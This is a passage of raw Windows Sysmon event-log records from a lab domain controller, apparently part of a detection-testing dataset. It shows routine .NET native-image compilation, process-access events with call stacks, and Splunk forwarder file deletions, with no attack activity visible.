\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A249-60D3-BF04-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.515{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A249-60D3-BF04-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A249-60D3-BE04-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.468{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A249-60D3-BE04-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.468{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A249-60D3-BE04-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:17.374{4DB9351A-A248-60D3-BD04-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a34-0\System.ServiceModel.Discovery.dll2021-06-23 21:06:17.374 23542300x800000000000000021953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.296{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E53931D09C14561A01FED65EE4B5EFDA,SHA256=D1D705CDB01536E1B9FEFD5909121B0E35C86CD0676029177D5494CC6B92249E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.953{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59A1985F4C70E99346B90BCBF09276E3,SHA256=388ECE5610A59774DFD1A71B9023EA264D76E70E6B30A41D17E08EB2025E1DC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.703{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C504-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.671{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C504-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.671{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C504-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.609{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C404-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.578{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C404-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.578{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C404-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:18.531{4DB9351A-A24A-60D3-C304-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\128-0\System.ServiceModel.ServiceMoniker40.dll2021-06-23 21:06:18.531 23542300x800000000000000021976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.531{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8DE3042FE92E597D108692471081BBC,SHA256=3CBC2B127D30C9B0AD61B07C47FC498D3F9DD2A2F9D85A77AFDEB05846E11A5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C304-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.468{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C304-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.468{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C304-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.407{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C204-00000000CF01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.390{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C204-00000000CF01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.390{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C204-00000000CF01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:18.328{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1478-0\System.ServiceModel.Routing.dll2021-06-23 21:06:18.328 10341000x800000000000000021968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.031{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.031{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 